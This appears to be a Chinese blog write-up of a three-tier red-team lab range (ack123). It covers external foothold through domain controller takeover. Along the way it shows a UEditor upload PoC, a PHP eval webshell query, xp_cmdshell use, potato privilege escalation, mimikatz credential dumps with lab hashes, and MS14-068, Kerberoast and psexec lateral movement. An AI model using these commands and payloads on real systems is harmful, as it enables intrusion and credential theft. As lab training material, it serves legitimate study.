内网渗透、三层拓扑、红队考核靶场(ack123)

前言

1、此靶场出自暗月团队
2、因为自己搭环境有点复杂,而且这么多台机器卡死了,我先把所有的杀软手动卸载了,不然因为环境问题处差错不好排查,免杀部分单独学习了!

环境搭建

https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click

在这里插入图片描述
在这里插入图片描述

外网打点

对ip信息搜集

nmap -sC -sV -A 192.168.3.46

在这里插入图片描述
信息搜集后发现以下有用信息

中间件版本iis8.5
80端口的web服务是hdhcms
999端口有phpmyadmin

尝试访问 ip:999 看一下phpmyadmin有没有弱口令什么的
答案是:没有!!!!

对web服务进行信息搜集

指纹

在这里插入图片描述
可以看到是java的站

扫描目录

dirsearch -u 192.168.3.46

在这里插入图片描述
扫到一个admin

后台测试

简单测了一下sql注入啥的,先注册一个账号进去看看
在这里插入图片描述
在这里插入图片描述

进来以后看到了网站的物理目录,还有一个上传目录,还有一个文本编辑器

文件上传测试

没权限访问上传接口,先放着

文本编辑器getshell

编辑器漏洞
https://www.cnblogs.com/Ivan1ee/p/10198866.html

漏洞检测

访问 http://192.168.3.46/admin/net/controller.ashx

出现下面这样
在这里插入图片描述

poc

<form action="http://192.168.3.46/admin/net/controller.ashx?action=catchimage"      enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

在这里插入图片描述
这里搞错了,哥斯拉是asp,图就不换了
在这里插入图片描述
用哥斯拉连一下我们的马儿!
在这里插入图片描述
在这里插入图片描述
可以看到这上面是两个网段,22网段应该是下一层

弹到cs上面操作

在这里插入图片描述

提权(拿下web1主机)

whoami /prive

这两个权限中的一个启用一个就可以使用烂土豆提权

SeAssignPrimaryTokenPrivilege
SeImpersonatePrivilege 

在这里插入图片描述
成功提权到system权限
在这里插入图片描述

横向移动

信息搜集

ipconfig /all

发现两个IP网段
192.168.22.128
192.168.3.46
net view /domain
没有域

扫描一下存活主机
![在这里插入图片描述](https://img-blog.csdnimg.cn/d1e73927bc5d4179bb0acb5在这里插入图片描述
端口扫描一下,看到个1433
利用cs的文件上传上传一个fscan一把梭一下

https://github.com/shadow1ng/fscan
fscan.exe -h 192.168.22.0/24

也没扫到啥东西
获取凭证

去物理目录下面看一下
在这里插入图片描述
在这里插入图片描述
发现了数据库信息

连接192.168.22.130的数据库

在这里插入图片描述
发现是sqlserver的数据库

http://sqlwiki.radare.cn/#/attackQueries/executingOSCommands
这里有常见的sql注入语句

在这里插入图片描述

powershell上线cs

EXEC master.dbo.xp_cmdshell'你的上线语句'

提权(拿下data1主机)

烂土豆提权
在这里插入图片描述

横向移动

信息搜集

fscan一把梭

在这里插入图片描述
两个网段
192.168.22.*
10.10.10.*
还发现另一台主机
192.168.22.135

对192.168.22.131(web2)进行渗透

挂个代理访问一下看看

ps:可以用cs自带的socks4a反向代理搭建隧道,也可以自己用frp搭建一个socks5
这一部分我就不上细节了

在这里插入图片描述

jwt:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNjUyODU5OTYyLCJuYmYiOjE2NTI4NTk5NzIsImV4cCI6MTY1Mjg2MDU2MiwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.rkaaYAS4Aos00hP6x4GQ6CQaNw1SU6lsQCwNj6Ev_a0"

在这里插入图片描述
打出来一个密码也不知道是啥

Qweasdzxc5

继续信息搜集一下,爆破一下后台

这里卡了半天,dirsearch扫不出来,要丰富字典辣!!!!
http://192.168.22.131/phpmyadmin4.8.5/index.php

在这里插入图片描述

mysql数据库getshell

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后执行一个查询就行了
SELECT ‘<?php phpinfo(); @eval($_POST[“pass”]);’
在这里插入图片描述
蚁剑直接连了 ps:不知道为啥哥斯拉连不上,可能是代理的问题吧

弹到cs上面操作(拿下web2主机)

配置一个listener转发然后cmd弹shell
或者正向连接

https://blog.csdn.net/qq_42094992/article/details/115087045

在这里插入图片描述
system全新

横向移动

信息搜集

在这里插入图片描述
进程里面有在域里面的

扫描一下c段

在这里插入图片描述
10.10.10.* 网段有三台主机

搜集一下域内信息

在这里插入图片描述
在这里插入图片描述

这里出现了这个问题
在这里插入图片描述

重新配置一下靶场

打到这里发现不对劲,信息搜集老是找不到域控,然后我去靶机看了看发现,这台机子的dns服务器配错了,没配到域控的ip,简直坑。。。。

重新搜集域内信息

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结一下
1.存在域 ack123.com
2.域控的账号是administrator
3.域控是16server-dc1
4.域控的ip是10.10.10.135

凭证信息

用mimikatz获取一下凭证信息
在这里插入图片描述

ACK123\web2 85b998a3d8f1904bc6f2d6b5f418be7e
12SERVER-WEB2\Administrator b78ee36a79ed9763b66519f86825a6bd

PTH(hash 传递)

虽然没有获取到明文密码,但是获取了域管理员用户的NTLM
通过mimikatz工具进行Hash传递。
![在这里插入图片描述](https://img-blog.csdnimg.cn/06a7b592561d4385a9d6131f31f2e5ad.png

看到pid是7044
利用cs制作一个令牌
这个手段原理是可以的,可我一直没成功,后来发现,域看错了,这个域管帐号不是ack123的域,我真的服了!!!!

PTT(票据传递)

ms14-068

条件

需要条件:
我们执行命令: systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在MS14-068漏洞
域内普通用户SID
域内普通用户密码(假装密码解密出来了嘿嘿,学习为主)
实施

在这里插入图片描述

whoami /user

在这里插入图片描述
这里获取到的 用户名\域\sid 不在域里面
mimikate收集一波
在这里插入图片描述

Authentication Id : 0 ; 321974 (00000000:0004e9b6)
Session           : Interactive from 1
User Name         : web2
Domain            : ACK123
Logon Server      : 16SERVER-DC1
Logon Time        : 2022/5/19 11:37:42
SID               : S-1-5-21-2015848930-1301831522-615504165-1104
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 85b998a3d8f1904bc6f2d6b5f418be7e
	 * SHA1     : 09b436459c1e57b9fe5af3ae1d04847a444df556
	 [00000003] Primary
	 * Username : web2
	 * Domain   : ACK123
	 * NTLM     : 85b998a3d8f1904bc6f2d6b5f418be7e
	 * SHA1     : 09b436459c1e57b9fe5af3ae1d04847a444df556
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码

ms14-068.exe -u web2@ack123.com -s S-1-5-21-2015848930-1301831522-615504165-1104 -d 10.10.10.135 -p QWEasd.7788

在这里插入图片描述

然后改一下格式 #一定要用python2 不要用python3
python2 KrbCredExport.py TGT_web2@ack123.com.ccache web2.ticket

在这里插入图片描述
然后注入凭证

kerberos_ticket_use /Users/yezi/Desktop/*********/KrbCredExport-master/web2.ticket

然后net use连接域控
后面不操作了,打补丁了。。。
在这里插入图片描述

参考资料
https://blog.csdn.net/weixin_30737363/article/details/96114252

kerberost攻击

Kerberoast攻击共分为五步
1.  SPN发现
2.  请求服务票据
3.  导出服务票据
4.  破解服务服务票据
5.  重写服务票据
shell setspn -T ack123.com -q */*
查询域内用户注册的spn

在这里插入图片描述

创建一个票据,这里只有RC4加密才能利用脚本进行破解
mimikatz kerberos::ask /target:mysql/16server-dc1.ack123.com

在这里插入图片描述

mimikatz kerberos::list
列出票据

在这里插入图片描述
搞一个空目录
在这里插入图片描述

导出票据到当前目录
mimikatz kerberos::list /export

下载下来然后
在这里插入图片描述

爆破
https://github.com/nidem/kerberoast

在这里插入图片描述
那么配合上上面搜集到的域管理员账号

Administrator
P@55w0rd!

开启ipc连接

shell net use \\10.10.10.135\ipc$ /user:Administrator P@55w0rd!

在这里插入图片描述

上线域控(10.10.10.135拿下)

搞个smb
在这里插入图片描述
然后psexec直接梭哈
在这里插入图片描述

横向一下data2主机

这里从web2主机或者域控主机使用域控的hash直接横向移动就行了

  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值